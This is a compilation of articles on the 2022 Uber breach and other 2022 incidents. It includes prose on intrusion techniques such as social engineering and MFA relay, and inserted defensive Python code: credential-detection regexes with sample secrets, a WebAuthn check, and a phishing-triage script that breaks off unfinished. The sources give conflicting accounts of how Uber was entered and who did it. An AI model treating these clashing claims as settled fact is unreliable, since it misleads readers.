The idea is never to point a finger at any victim of a cyber-attack but simply to learn from their experience. The learning here is crystal clear: if employees of a Fortune 500 company can fall prey to a social engineering attack that can have such massive repercussions, anyone who assumes that their non-IT staff won’t make such a mistake is in risky territory. The only lesson here is that no organisation should ever assume they are 100% safe. Investing in cyber security and awareness training for staff should be a never-ending process and a life-long commitment. Services like our Virtual Cyber Assistant can even help organisations with very modest budgets improve their cybersecurity maturity and cyber resilience over time.


We, at Cyber Management Alliance, created this Google Doc on 16th September, 2022 and invite you to take part in sharing the intelligence and knowledge about this cyber-attack. 

We are determined to use the power of the crowds, the Wisdom of Crowds, to ensure that we all have a fighting chance to protect not only cyberspace, but the physical world that is now almost, if not fully, connected to cyberspace. 

This is a work in progress document and NOT final in any sense. Please feel free to contribute and/or make suggestions at [email protected]

Disclaimer: This document has been created with the sole purpose of encouraging discourse on the subject of cybersecurity and good security practices. Our intention is not to defame any company, person or legal entity. Every piece of information mentioned herein is based on reports and data freely available online. Cyber Management Alliance neither takes credit nor any responsibility for the accuracy of any source or information shared herein.

What & How it Happened 

1st January-2022: Uber ignored a vulnerability disclosed by bug bounty hunter SAFE (@0x21SAFEs). The bug hunter warned the company that the vulnerability could be abused by threat actors to email the 57 million Uber users and drivers whose information was leaked in the 2016 data breach. But Uber, allegedly, didn’t take it seriously.

17th August-2022: HackerOne shut down one of Uber's assets on the HackerOne platform called ListStorageBuckets (a bug bounty program) as it was apparently compromised by the hackers.

15th September-2022: An 18-year-old hacker hit Uber and accessed its internal and third-party services. Uber disclosed the incident on Twitter: “We are currently responding to a cybersecurity incident. We are in touch with law enforcement and will post additional updates here as they become available.”

16th September-2022: Taking responsibility for the cyber attack, the hacker told The New York Times that he had been working on his cybersecurity skills for several years. He said he had broken into Uber’s systems because the company had weak security. In the Slack message that announced the breach, the threat actor raised the concern of Uber drivers. He said: “Uber drivers should receive higher pay.”

16th September-2022: According to sources including The New York Times and Reuters, the 18-year-old hacker said he had sent a text message to an Uber employee claiming to be from corporate IT. The employee was persuaded to hand over a password that allowed the hacker to gain access to Uber's systems.

16th September-2022: The hackers, apparently, told the NYT that they breached Uber for fun and are considering leaking the company’s source code. They also shared that they have gained access to Uber’s systems through login credentials obtained from an employee via social engineering, which allowed them to access an internal company VPN. From there, they found PowerShell scripts on Uber’s intranet containing access management credentials that allowed them to allegedly breach Uber’s AWS and G Suite accounts. 

16th September-2022: According to The Register , the screenshots leaked on Twitter show: “An intruder has compromised Uber's AWS cloud account and its resources at the administrative level; gained admin control over the corporate Slack workspace as well as its Google G Suite account that has over 1PB of storage in use; has control over Uber's VMware vSphere deployment and virtual machines; access to internal finance data, such as corporate expenses; and more.” The source claims: “If this is correct, Uber has been significantly compromised with data and infrastructure at multiple levels available to the intruder.” 

16th September-2022: The Register said there are many claims that show that hackers allegedly have access to a Confluence installation, private source code repositories, and a SentinelOne security dashboard used by the app developer. 

16th September-2022: Tagging the tweet of Colton (@ColtonSeal) in which he shared a screenshot of the hacker claiming that he hacked Uber ( I announce I am a hacker and Uber has suffered a data breach. Slack has been stolen, confidential data with Confluence, stash and 2 monorepos from phabricator have also been stolen, along with secrets from sneakers. #uberunderpaisdrives ), the infosec analyst payloadartist (@payloadartist) said: “Apparently, the attacker even posted a message on Slack informing the Uber employees of the breach but everyone thought it was a joke.” 

16th September-2022: Payloadartist (@payloadartist) posted the impact details. He tweeted: “Uber apparently got grandly hacked. Attacker basically got access to almost everything (allegedly)

  • Google Workspace Admin
  • AWS Accounts
  • HackerOne Admin
  • SentinelOne EDR
  • Financial Dashboards”

16th September-2022: Sam Curry, cybersecurity expert and threat hunter, told the NYT: “It seems like maybe they're this kid who got into Uber and doesn't know what to do with it, and is having the time of his life.”

16th September-2022: Sam Curry(@samwcyo) also highlighted this incident and the impact in his tweet: “Someone hacked an Uber employee's HackerOne account and is commenting on all of the tickets. They likely have access to all of the Uber HackerOne reports.” 

16th September-2022: Sam Curry (@samwcyo) posted a tweet in which the Uber employee shared some details and urged to keep his identity hidden: “Feel free to share but please don’t credit me: at Uber, we got an “URGENT” email from IT security saying to stop using Slack. Now anytime I request a website, I am taken to a REDACTED page with a pornographic image and the message “F*** you wankers.” 

16th September-2022: Sam Curry (@samwcyo) tweeted another employee’s statement: “From another Uber employee:

Instead of doing anything, a good portion of the staff was interacting and mocking the hacker thinking someone was playing a joke. After being told to stop going on slack, people kept going on for the jokes. Lmao.” 

16th September-2022: While Uber staff were, apparently, treating the hacker's messages as a joke, one unnamed employee shared with Sam Curry a screenshot of a colleague asking: “Sorry to be a stick in the mud, but I think IT would appreciate less memes while they handle the breach.”

16th September-2022: The malware librarians at VX Underground tweeted: 

“More Uber information data disclosed: vSphere, Google workplace data, and more AWS data.” 

“A Threat Actor claims to have completely compromised Uber - they have posted screenshots of their AWS instance, HackerOne administration panel, and more. They are openly taunting and mocking @Uber.” 

16th September-2022: Sam Curry (@samwcyo) tweeted: “The attacker is claiming to have completely compromised Uber, showing screenshots where they’re full admin on AWS and GCP.” 

16th September-2022: The malware librarians at VX Underground tweeted that hackers accessed Uber’s financial data: “ They disclosed Uber's financial data”. 

16th September-2022: Sharing a hint on the tactics used in the Uber data breach incident, the cybersecurity expert Corben Leo (@hacker_) tweeted: “Uber was hacked. The hacker social engineered an employee -> logged into the VPN and scanned their intranet.” 

16th September-2022: Corben Leo also relayed what the attacker (going by “TeaPot”) told him about an internal network share: “Apparently there was an internal network share that contained powershell scripts.” “One of the powershell scripts contained the username and password for an admin user in Thycotic (PAM). Using this i was able to extract secrets for all services, DA, DUO, Onelogin, AWS, GSuite.”

16th September-2022: Security researcher Bill Demirkapi (@BillDemirkapi) explained how hackers compromised Uber’s MFA as he tweeted this thread:  

“ Let's talk about how they were compromised. The attacker has been quite upfront about how they compromised Uber's corporate infrastructure. Uber appears to use push notification MFA (Duo) for their employees. How can an attacker get around MFA?” 

“An extremely common misconception people have with standard forms of MFA (push/touch/mobile) is that it prevents social engineering. Although MFA can protect against an attacker who only has the victim's credentials, it is commonly still vulnerable to MiTM attacks.” 

“An attacker can setup a fake domain that relays Uber's real login page with tooling such as Evilginx. The only difference is the domain they are visiting, which is easy to miss. For most MFA, nothing stops the attacker from relaying the authentication process.” 

“Once the attacker compromised an employee, they appear to have used that victim's existing VPN access to pivot to the internal network. Internal infrastructure is often significantly less audited and evaluated compared to external infrastructure.” 

“In this case, the attacker appears to have found an internal network share that contained scripts with privileged credentials, giving them the keys to the kingdom. They claim to have compromised Uber's Duo, OneLogin, AWS, and GSuite environments.”

16th September-2022: After Uber took its internal software tools offline due to the cyber attack, it gradually started bringing them online. In a statement, the company stated: “Internal software tools that we took down as a precaution yesterday are coming back online this morning.” 

18th September-2022: Michael (@LegacyKillaHD), a video-game commentator, hinted at who could be behind the Uber hack: “Just an FYI. Person behind this GTA 6 leak is allegedly behind the recent hack of Uber a few days ago. At least he claims to be & used a similar method to steal Rockstar's secrets. Essentially, this isn't an angry employee or fan. A hacker that will be difficult to track down.”

16th September-2022: In its official update, Uber said: “We have no evidence that the incident involved access to sensitive user data (like trip history). All of our services including Uber, Uber Eats, Uber Freight, and the Uber Driver app are operational.” 

16th September-2022: According to Bloomberg, Uber shares fell 5.2% in pre-market trading in New York Friday. 

16th September-2022: According to BleepingComputer , “The attacker downloaded all vulnerability reports before they lost access to Uber's bug bounty program. This likely includes vulnerability reports that have not been fixed, presenting a severe security risk to Uber. HackerOne has since disabled the Uber bug bounty program, cutting off access to the disclosed vulnerabilities. However, it would not be surprising if the threat actor had already downloaded the vulnerability reports and would likely sell them to other threat actors to cash out on the attack quickly.”
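The attacker's own account in the timeline above (an internal network share, PowerShell scripts holding a PAM admin password, secrets pulled for AWS and G Suite) describes a failure that is cheap to look for before an intruder does. The following is an added example, not tooling from Uber or from Cyber Management Alliance: a Python scanner that walks a directory tree of PowerShell scripts, flags the patterns that commonly carry hard-coded credentials, and redacts the matched value in its report. The sample scripts, paths and hostnames are constructed for the example (the AWS key is Amazon's documented placeholder key), and the regular expressions are assumptions to be tuned for a real estate.

```python
"""Find hard-coded credentials in PowerShell scripts on a share.

Added example, not Uber's or CMA's tooling. The patterns are assumptions that
cover the usual ways secrets end up in .ps1 files; tune them for your estate.
"""
import re
import tempfile
from pathlib import Path

# (rule name, regex). The last capture group of each regex is the suspect value.
PATTERNS = [
    # ConvertTo-SecureString "literal" -AsPlainText: a plaintext password in the file
    ("plaintext-securestring",
     re.compile(r"""ConvertTo-SecureString\s+(["'])([^"']+)\1\s+-AsPlainText""", re.I)),
    # $password = "...", $apiToken = '...', $pamSecret = "..."
    ("credential-assignment",
     re.compile(r"""\$\w*(?:pass|pwd|secret|token|apikey)\w*\s*=\s*(["'])([^"']+)\1""", re.I)),
    # -Password "literal", -Token '...', -SecretKey "..."
    ("credential-parameter",
     re.compile(r"""-(?:Password|Secret|ApiKey|Token)\w*\s+(["'])([^"']+)\1""", re.I)),
    # AWS access key IDs have a fixed shape and deserve a dedicated rule
    ("aws-access-key-id",
     re.compile(r"\b(AKIA[0-9A-Z]{16})\b")),
]


def _is_placeholder(value: str) -> bool:
    """Skip template values and variable references such as <password> or $(Read-Host)."""
    v = value.strip()
    return (v == "" or v.startswith(("<", "$", "{{", "%"))
            or v.lower() in {"changeme", "password", "xxx", "todo"})


def _redact(value: str) -> str:
    """Keep a short prefix so a finding can be located without re-leaking the secret."""
    return value[:4] + "*" * (len(value) - 4) if len(value) > 4 else "****"


def scan_text(text: str, source: str) -> list[dict]:
    """Return findings for one script body; `source` is only used for reporting."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        for rule, rx in PATTERNS:
            for m in rx.finditer(line):
                value = m.group(m.lastindex)
                if _is_placeholder(value):
                    continue
                findings.append({"source": source, "line": lineno,
                                 "rule": rule, "value": _redact(value)})
    return findings


def scan_tree(root: Path, suffixes=(".ps1", ".psm1", ".psd1")) -> list[dict]:
    """Walk a directory (e.g. a mounted share) and scan every PowerShell file in it."""
    findings = []
    for path in sorted(root.rglob("*")):
        if path.is_file() and path.suffix.lower() in suffixes:
            try:
                text = path.read_text(encoding="utf-8", errors="replace")
            except OSError:
                continue  # unreadable file: report separately in a real run
            findings.extend(scan_text(text, str(path.relative_to(root))))
    return findings


# Constructed sample scripts: one clean, two with embedded secrets.
SAMPLE_SCRIPTS = {
    "ops/backup.ps1": (
        "# Prompts at run time: nothing to harvest from the file itself\n"
        "$cred = Get-Credential -Message 'Backup service account'\n"
        "$pw = Read-Host -AsSecureString\n"
        "Connect-Share -Credential $cred\n"
    ),
    "ops/rotate-accounts.ps1": (
        "$pamUser = 'svc-rotate'\n"
        "$pamPassword = 'Sup3rS3cret!2022'\n"
        "$secure = ConvertTo-SecureString 'Sup3rS3cret!2022' -AsPlainText -Force\n"
        "Invoke-RestMethod -Uri 'https://pam.corp.example/api' -Headers @{ X-Token = 'placeholder' }\n"
    ),
    "deploy/push-image.ps1": (
        "$env:AWS_ACCESS_KEY_ID = 'AKIAIOSFODNN7EXAMPLE'\n"
        "$env:AWS_SECRET_ACCESS_KEY = $(Read-Host 'secret')\n"
        "Set-Thing -Password '<password-from-vault>'\n"
    ),
}


def demo() -> list[dict]:
    """Write the constructed samples to a temp directory and scan it."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        for rel, body in SAMPLE_SCRIPTS.items():
            p = root / rel
            p.parent.mkdir(parents=True, exist_ok=True)
            p.write_text(body, encoding="utf-8")
        return scan_tree(root)


if __name__ == "__main__":
    for f in demo():
        print(f"{f['source']}:{f['line']}  {f['rule']:24} {f['value']}")
```

Point `scan_tree` at the root of a mounted share instead of the temp directory to run it for real. The rules are deliberately narrow (a quoted literal next to a credential-looking name) so that the report stays short enough for someone to act on; widen them, or add a second pass for high-entropy strings, once the obvious cases are gone.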

References: 

  • https://www.linkedin.com/posts/chiefinfosec_leadership-informationsecurity-incidentresponse-activity-6976415560624439296-OWgb?
  • https://twitter.com/Uber_Comms/status/1570584747071639552
  • https://www.theverge.com/2022/9/16/23356213/uber-hack-teen-slack-google-cloud-credentials-powershell  
  • https://www.nytimes.com/2022/09/15/technology/uber-hacking-breach.html   
  • https://twitter.com/samwcyo/status/1570581007044317184  
  • https://twitter.com/vxunderground/status/1570611979169202179  
  • https://twitter.com/ColtonSeal/status/1570596125924794368  
  • https://twitter.com/hacker_/status/1570582547415068672  
  • https://twitter.com/vxunderground/status/1570597582417821703  
  • https://www.theregister.com/2022/09/16/uber_security_incident/  
  • https://www.washingtonpost.com/technology/2022/09/15/uber-hack/  
  • https://hackerone.com/uber/updates?type=team  
  • https://twitter.com/hacker_/status/1570582202697809920  
  • https://twitter.com/payloadartist/status/1570631734861111296  
  • https://www.reuters.com/business/autos-transportation/uber-investigating-computer-network-breach-nyt-2022-09-16/  
  • https://twitter.com/0x21SAFE/status/1476991015395471364  
  • https://www.bleepingcomputer.com/news/security/uber-hacked-internal-systems-breached-and-vulnerability-reports-stolen/  
  • https://www.cnbc.com/2022/09/16/uber-investigates-cybersecurity-incident-after-reports-of-a-hack.html  
  • https://www.bloomberg.com/news/articles/2022-09-16/uber-says-it-s-investigating-extent-of-cybersecurity-incident  
  • https://www.uber.com/en-CA/newsroom/security-update/  
  • https://twitter.com/LegacyKillaHD/status/1571439441482235904  

Legal & Disclaimers

Every contributor has made an effort to ensure that the information in this document is accurate. Cyber Management Alliance Ltd (herein referred to as CMA) hereby disclaims any liability to any party for any loss, damage or disruption caused by this information in this document or errors or omissions, whether such errors or omissions result from negligence, accident or any other cause. 

The reader must understand that this document is not intended to replace professional consultancy, advice and guidance. The reader must ensure that he/she seeks professional consultation and/or refers to other material and/or consultants in matters relating to, but not limited to, cyber attacks or data breaches. Cybersecurity, information security and data privacy are a complex set of topics and the authors and CMA advise the reader to take full responsibility and precaution to protect their personal information and not to take risks beyond the level of experience, aptitude, training and comfort level.

Top Cyber Attacks of 2022 – What Were the Biggest Events of the Year?

Taking a Look at Uber, Optus, Rockstar Games, and Other Major Cybersecurity Events.

Last updated on December 30, 2022

2022 was an all-around rollercoaster, and it was no different in the world of cybersecurity. Some of the biggest cyber attacks in recent memory occurred this year, as threat actors got slicker and their methods more sophisticated. Today, we will take a look back at some of the biggest cybersecurity incidents that happened in 2022.

Twitter Breach Causes Data of 5.4 Million Accounts to be Stolen

On November 24, 5,485,635 Twitter user records were made available for free on a hacker forum. Security experts attributed the data theft to an API flaw that Twitter said it had patched in January of this year.

Fortunately, most of the database consisted of information that was already public, like Twitter IDs, names, and login names, but some records also contained private information such as phone numbers and email addresses.

The flaw was allegedly introduced by an update to Twitter's code in June 2021. Before Twitter's engineers noticed and fixed the bug in January 2022, threat actors had already used it to harvest records. Shortly after, the data was put up for sale on a hacking forum for $30,000. Twitter addressed the situation in July 2022, after learning about the database for sale through a press report.

After reviewing a sample of the available data for sale, we confirmed that a bad actor had taken advantage of the issue before it was addressed. (…) While no passwords were exposed, we encourage everyone who uses Twitter to enable 2-factor authentication using authentication apps or hardware security keys to protect your account from unauthorized logins.

Twitter statement (source)

Uber’s Major Security Breach

Uber is one of the most used services on the planet, so when the company announced that it was dealing with a cybersecurity incident, a lot of people became concerned. Uber's systems were breached on September 15th by “Nwave”, a hacker affiliated with the notorious threat group Lapsus$.

The hacker was able to access internal systems used by the business, including the Slack server, the Amazon Web Services panel, the VMware ESXi virtual machines, and the Google Workspace email admin dashboard.

Lapsus$ extracted some internal messages and financial information and accessed several internal tools, including G Suite and Slack. Uber announced that, despite reaching several internal systems, the threat actor was not able to extract sensitive user data. To get into Uber's systems, the threat group used credentials from a third-party vendor, most likely purchased on the dark web.

First and foremost, we’ve not seen that the attacker accessed the production (i.e. public-facing) systems that power our apps; any user accounts; or the databases we use to store sensitive user information, like credit card numbers, user bank account info, or trip history. We also encrypt credit card information and personal health data, offering a further layer of protection.

Uber's statement following the incident (source)

However, this was not the only cyber incident Uber suffered in 2022. The company was the victim of another data breach on December 10th, when information on 77,000 employees was accessed by a threat actor.

Optus Data Breach

Optus, the second-largest telco in Australia, was the victim of a massive data breach in September 2022. ID numbers of 2.1 million current and former customers were compromised, and all 9.8 million customers had other personal data exposed, such as email addresses, birthdates, and phone numbers.

More than 20 Federal, State, and Territory government agencies and departments were involved in the investigation of the breach. Following the investigations, Optus confirmed that:

  • Approximately 1.2 million customers have had at least one number from a current and valid ID, plus personal information, compromised;
  • Approximately 900,000 customers have had numbers relating to expired IDs compromised, in addition to personal information.

Alongside another breach, discussed below, the Optus data breach caused a cybersecurity revolution in Australia. The Australian authorities announced an ongoing cooperative operation against cybercriminal organizations, consisting of 100 of the best cybersecurity experts and professionals in the country. Clare O'Neil, the Australian Minister for Home Affairs and Cyber Security, “declared war” on cyber criminals, stating that the newly formed force will “scour the world, hunt down the criminal syndicates and gangs who are targeting Australia in cyber-attacks and disrupt their efforts.”

Medibank Ransomware Attack

The other major Australian breach of the year hit Medibank, a health insurer serving more than 3.9 million people in Australia, which was the victim of a ransomware attack. Following the incident, customers' personal data and some health claims data were accessed by the responsible threat group.

At first, Medibank played down the seriousness of the breach, but soon after, the ransomware group contacted the company to demand money and delivered a sample of 100 stolen files out of the 200GB of data they claimed to have taken in the attack.

The company confirmed in an official statement that the following data was compromised:

  • Name, date of birth, address, phone number, and email address for around 9.7 million current and former customers and some of their authorized representatives.
  • Medicare numbers (but not expiry dates) for ahm customers;
  • Passport numbers (but not expiry dates) and visa details for international student customers;
  • Health claims data for around 160,000 Medibank customers, around 300,000 ahm customers, and around 20,000 international customers. This includes the service provider name and location, where customers received certain medical services, and codes associated with diagnosis and procedures administered.
  • Health provider details, including names, provider numbers, and addresses.

As mentioned previously, this case contributed to the formation of a special cybersecurity force in Australia.

GTA VI Footage Leaked

The world of gaming was also not safe in 2022. Footage of one of the most anticipated games in recent memory, GTA VI , got leaked on GTAForums after a threat actor managed to access Rockstar Games’ systems through Slack.

The user “teapotuberhacker” posted more than 90 videos of an early development version of the game, showcasing animation tests, gameplay mechanics, and level layouts. The fans of the game series were also delighted to find that the game will feature its first female protagonist and that it will make a return to one of the most beloved cities in the series, Vice City.

The threat actor responsible for the leak also claims to have been involved in the Uber breach we talked about previously.

NVIDIA Data Breach

The chipmaker acknowledged on March 1st that threat actors had gained access to sensitive data and employee login credentials after a network breach in February.

NVIDIA initially said in a statement that it was investigating an event that had some impact on its systems. Not long after, the data extortion gang Lapsus$ claimed responsibility for the hack and said 1TB of data had been stolen from NVIDIA's network. Over the weekend, Lapsus$ uploaded a 20GB package containing data from NVIDIA's servers as proof. This archive also contained employees' password hashes.

Lapsus$ threatened to leak hardware information unless NVIDIA removed the lite hash rate (LHR) limiter from the GeForce RTX 30 Series firmware.

How Can Heimdal® Help You and Your Company Stay Safe in 2023

We have a lot to learn from these cases, as well as from many others that I have not mentioned in this post. But I think we can all conclude that threat prevention should be one of our greatest concerns in cybersecurity.

To help you better secure your business in the future, Heimdal® offers a suite of tailor-made solutions. Our Heimdal® Threat Prevention – Network, for example, is a DNS filter that adds HIPS/HIDS capabilities to your corporate network, stopping attackers in their tracks.

Heimdal® Network DNS Security

  • No need to deploy it on your endpoints;
  • Protects any entry point into the organization, including BYODs;
  • Stops even hidden threats using AI and your network traffic log;
  • Complete DNS, HTTP and HTTPs protection, HIPS and HIDS;

Its AI-powered neural network not only recognizes but also anticipates sophisticated threats, so you won't be caught off guard if a new malware strain attempts to infect your company. It also requires no software on endpoints.

Complementing it is our Heimdal® Threat Prevention – Endpoint module, so that your business receives full defense against DNS attacks as well as well-known dangers like ransomware, data breaches and exploits. With category-based restriction of web pages, your company's confidential information is protected regardless of where in the world your employees work from.

Heimdal® DNS Security Solution

  • Machine learning powered scans for all incoming online traffic;
  • Stops data breaches before sensitive info can be exposed to the outside;
  • Advanced DNS, HTTP and HTTPS filtering for all your endpoints;
  • Protection against data leakage, APTs, ransomware and exploits;

Parting Words

So with that, the 2022 season comes to an end! These were only some of the major events which occurred in cyberspace this year. You can study other cyber attacks by checking out our blog , where you can find the latest news and other helpful articles. I would like to wish you all a happy (and safe) new year, and see you again in 2023!

If you liked this article, follow us on LinkedIn , Twitter , Facebook , Youtube , and Instagram for more cybersecurity news and topics.

Author Profile

Cristian Neagu

CONTENT EDITOR

Cristian is a Content Editor & Creator at Heimdal®, where he developed a deep understanding of the digital threat landscape. His style resonates with both technical and non-technical readers, as shown by his skill at communicating cybersecurity norms effectively, in an easy-to-understand manner.

© 2024 Heimdal ®

Uber Data Breach: What To Know About the 2022 Cybersecurity Attack

No matter how robust network security is, even the biggest companies fall victim to cyber attacks. These attacks can be costly, to the tune of $4.3 million on average, but they also disrupt operations and hurt a company's reputation.

In fact, it is anticipated that cybercrime will cost the world $10.5 trillion annually by 2025. A recent breach at Uber reminds us of how social engineering attacks are on the rise and urges us to protect and train our employees to prevent such detrimental attacks. Below, we’ll dissect the Uber data breach and what you can do to avoid facing a similar devastating situation. 

So, What Happened at Uber?

On September 15, 2022, Uber employees were surprised to find an unauthorized user posting in the company's Slack workspace. The intruder had compromised an account and left a message that read, “I announce I am a hacker and Uber has suffered a data breach.” Uber employees, speaking anonymously, said it appeared that the hacker had breached multiple internal applications and accessed sensitive data.

Although the suspected hacker, allegedly only 18 years old, has been arrested, the damage was done. The hacker had left an explicit image on Uber's internal systems and exposed how they had compromised the company using social engineering. Uber now has to run its own internal investigation into the incident, and will more than likely have to enact a costly remediation plan.

How Did the Hacker Gain Access to Uber’s Internal Systems?

Uber's cybersecurity controls would probably have been enough to prevent the breach, if it weren't for social engineering. The hacker admitted on Twitter that they gained access to the company's internal VPN by tricking an employee into handing over their password: the hacker claimed to be from corporate IT and to need it. From there, the threat actor obtained credentials that allowed them to breach Uber's AWS and G Suite accounts.

Social engineering, the practice of exploiting human emotion to get a victim to perform an action or hand over the information the threat actor needs, is not uncommon in the cybersecurity world. In fact, many experts agree that untrained employees are your biggest area of vulnerability. The threat actor responsible for the Uber data breach has also claimed to have used social engineering in an attack against Rockstar Games.
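The Uber intruder's path (a password handed over under an IT-support pretext, and the push-MFA relay that Bill Demirkapi describes earlier on this page) works because neither a password nor a push approval carries any proof of which site the user was actually talking to. A FIDO2/WebAuthn credential does: the browser writes the origin it is really displaying into clientDataJSON, the authenticator signs over it, and the relying party rejects any assertion whose origin is not its own. The following added Python example, which is not code from Mitnick Security or from Uber, simulates that check for a direct login and for one relayed through a look-alike domain. The hostnames are assumptions, and the signature verification over authenticatorData and the hash of clientDataJSON is left out so that only the origin and challenge checks are shown.

```python
"""Origin binding in WebAuthn: why a relayed login fails where push MFA does not.

Added example with assumed hostnames. Simplified: only the clientDataJSON checks
from the relying-party (RP) verification procedure are implemented; the
signature over authenticatorData || SHA-256(clientDataJSON) is not verified here.
"""
import base64
import hmac
import json
import secrets

EXPECTED_ORIGIN = "https://login.corp.example"  # assumption: the real RP origin


def b64url(data: bytes) -> str:
    """Base64url without padding, as WebAuthn encodes the challenge."""
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode("ascii")


def new_challenge() -> str:
    """RP side: a fresh, unpredictable challenge for one authentication ceremony."""
    return b64url(secrets.token_bytes(32))


def browser_build_client_data(origin_shown: str, challenge: str) -> bytes:
    """Browser side: clientDataJSON records the origin of the page the user is on.

    An Evilginx-style reverse proxy can forward the RP's challenge unchanged, but
    it cannot make the victim's browser write the RP's origin here: the browser
    writes the look-alike domain it is actually displaying.
    """
    client_data = {
        "type": "webauthn.get",
        "challenge": challenge,
        "origin": origin_shown,
        "crossOrigin": False,
    }
    return json.dumps(client_data, separators=(",", ":")).encode("utf-8")


def rp_check_client_data(client_data_json: bytes, issued_challenge: str) -> tuple[bool, str]:
    """RP side: the clientDataJSON checks that precede signature verification."""
    try:
        cd = json.loads(client_data_json)
    except ValueError:
        return False, "clientDataJSON is not valid JSON"
    if not isinstance(cd, dict) or cd.get("type") != "webauthn.get":
        return False, "unexpected ceremony type"
    got = str(cd.get("challenge", "")).encode("utf-8")
    if not hmac.compare_digest(got, issued_challenge.encode("utf-8")):
        return False, "challenge mismatch (replayed or cross-session assertion)"
    if cd.get("origin") != EXPECTED_ORIGIN:
        return False, f"origin mismatch: assertion was made for {cd.get('origin')!r}"
    return True, "ok"


def simulate_login(origin_shown_to_user: str) -> tuple[bool, str]:
    """One ceremony: the RP issues a challenge, the victim's browser (possibly
    behind a reverse-proxy phishing site) builds clientDataJSON, the RP checks it."""
    challenge = new_challenge()
    client_data = browser_build_client_data(origin_shown_to_user, challenge)
    return rp_check_client_data(client_data, challenge)


if __name__ == "__main__":
    # Legitimate login straight to the RP.
    print(simulate_login("https://login.corp.example"))
    # Same user, same challenge, but the page they signed in on is the proxy's domain.
    print(simulate_login("https://login-corp.example"))
```

A Duo push, by contrast, carries only the claim that someone is logging in as this user, so the relay scenario above is accepted as long as the victim taps Approve. The challenge check is what stops a captured assertion from being replayed later, which is why it is generated per ceremony and compared in constant time.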

Protect Your Company Against Incidents Like the Uber Data Breach 

Stay up to date with the latest social engineering techniques.

Although direct messaging and calling are popular social engineering techniques, the trend of impersonating well-known companies through email phishing scams is expected to keep growing this year. To protect your organization, be aware of these trends and speak with a cybersecurity consultant if you think your organization is vulnerable.

Test Your Network Vulnerabilities Regularly

Unfortunately, social engineering isn't going away, which means you need to know whether there are vulnerabilities within your network that can make a social engineering attack even more disastrous. For example, a threat actor who has gained access to your internal network with stolen login credentials may be able to move laterally and escalate their privileges with help from unpatched applications or outdated technologies.

Routine vulnerability assessments, performed quarterly, can help keep your organization's private data private. An expert assessment can separate false positives from real findings in vulnerability scans and provide a report with more detail, typically including the vulnerabilities discovered, a walkthrough of what was done, and research and solutions to better protect your organization.

Continuously Train Your Employees To Recognize Attacks

Uber was hacked in 2022 because an employee did not recognize that they were the target of social engineering. Cybersecurity awareness training can arm employees with the information they need to act when suspicious activity occurs at work. Engaging learning tools such as training videos and live hack demonstrations can not only get your team up to speed, but also help motivate them to stay vigilant.

Kevin Mitnick Security Awareness Training

Aside from learning the details about cyberattacks like the Uber data breach, security awareness training for your employees can help keep you one step ahead of social engineers. 

Train your team when and where it’s convenient, with the world's largest security awareness training content library. Begin strengthening your organization’s security posture by exploring the Security Awareness Training Library by Mitnick Security.

Topics: Social Engineering

© Copyright 2004 - 2024 Mitnick Security Consulting LLC. All rights Reserved. | Privacy Policy


Hotel Industry Cyber Update — September 2022

Authors: Max Pragnell, John Farley


The sensitive data hotels capture as a fundamental part of business is vast. Hotels collect consumers' identification (including passports), credit card information, addresses and — in cases involving spas, as an example — protected health information. Hospitality companies also retain employee data, trade secrets and suppliers' bank information.[1] This data makes hotels a valuable target for cybercriminals.

Ponemon and IBM Security's 2022 global case study report[2] revealed that $2.94 million was the average total cost of a data breach in the hospitality industry from 2021 to 2022. The associated costs from a breach come from several sources including lost business, reputational damage, legal costs, forensic activities, crisis management, regulatory response and customer notification — to name a few.

Recent examples of cyber attacks on the hospitality industry

Hotels and resorts have suffered from a variety of cyberattacks, but the most effective have been low-level social engineering and phishing campaigns. One cybercrime group known as TA558[3] has been targeting hospitality companies in Latin America with malicious links and attachments, using fake reservation emails aimed at hotel and travel company employees as the lure.

According to IBM Security's report,[2] 83% of global organizations suffer more than one data breach. In September 2022, a hack of a well-known UK-based multinational hospitality company led to a two-day outage of its online booking system.[4] The same group had also suffered a ransomware attack at one of its Turkish locations the previous month, although the two incidents are not necessarily connected. The same company settled a class-action lawsuit in 2019 over a malware breach that affected several of its hotels, restaurants and bars.

Hotel-specific cybersecurity challenges

A major challenge for hospitality in cyberspace is giving consumers a single access point from which to roam freely across a property. Third parties often manage restaurants, shops or spas within a hotel,[1] which means systems need to be interconnected and data needs to be shared. This typically runs through a property management system (PMS), but a PMS is not bulletproof: it requires strong cybersecurity measures and strict data compliance. Payment Card Industry Data Security Standard (PCI DSS) compliance, multi-factor authentication (MFA), endpoint detection and response (EDR), and Data Protection Act compliance are safeguards required in different scenarios.

Hospitality companies face a further challenge when buying and selling properties. The buyer may face difficulties integrating new property management systems, payment terminals or overall cybersecurity strategies. Meanwhile the seller needs to ensure no residual data can come back to hurt them.[1]

Popular types of cyber attacks

Phishing. Hackers send emails that seem to come from a trusted source to get hotel employees to open malware-laden attachments or click malicious links. In hospitality, time is money, so employees are often not well trained in cybersecurity. However, there are collections of templates commonly used by phishers and specific clues that an email may be dangerous. These templates can be used as training materials to educate staff about this threat.
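The "specific clues that an email may be dangerous" mentioned above can be turned into a first-pass triage check that a hotel's mailroom or helpdesk can run over a suspicious message before anyone opens it. The script below is an added example and is not part of the Gallagher update; the trusted-domain allowlist, the two sample messages and the heuristics are constructed for illustration. It parses a raw message and reports the clues phishing templates tend to share: a sender domain that imitates a trusted booking domain (digit-for-letter swaps, brand names buried in a longer domain), a display name claiming a brand the address does not belong to, a Reply-To on a different domain, urgency language in the subject, and executable or macro-enabled attachment types.

```python
import email
from email import policy
from email.message import EmailMessage
from email.utils import parseaddr

# Constructed allowlist: domains hotel staff legitimately receive reservation traffic from.
TRUSTED_DOMAINS = {"booking.com", "expedia.com", "example-hotel.com"}
# Attachment types that have no place in a reservation request.
RISKY_EXTENSIONS = {".exe", ".js", ".vbs", ".scr", ".iso", ".lnk", ".hta", ".docm", ".xlsm"}
URGENCY_WORDS = ("urgent", "immediately", "final notice", "suspended", "within 24 hours")
# Digit-for-letter swaps commonly seen in lookalike domains.
HOMOGLYPHS = str.maketrans({"0": "o", "1": "l", "3": "e", "5": "s", "7": "t"})


def _domain(header_value: str) -> str:
    """Lower-cased domain part of the first address in a header value."""
    return parseaddr(header_value)[1].rpartition("@")[2].lower()


def _normalize(domain: str) -> str:
    """Fold homoglyphs and the 'rn' -> 'm' trick so lookalikes compare equal to the brand."""
    return domain.translate(HOMOGLYPHS).replace("rn", "m")


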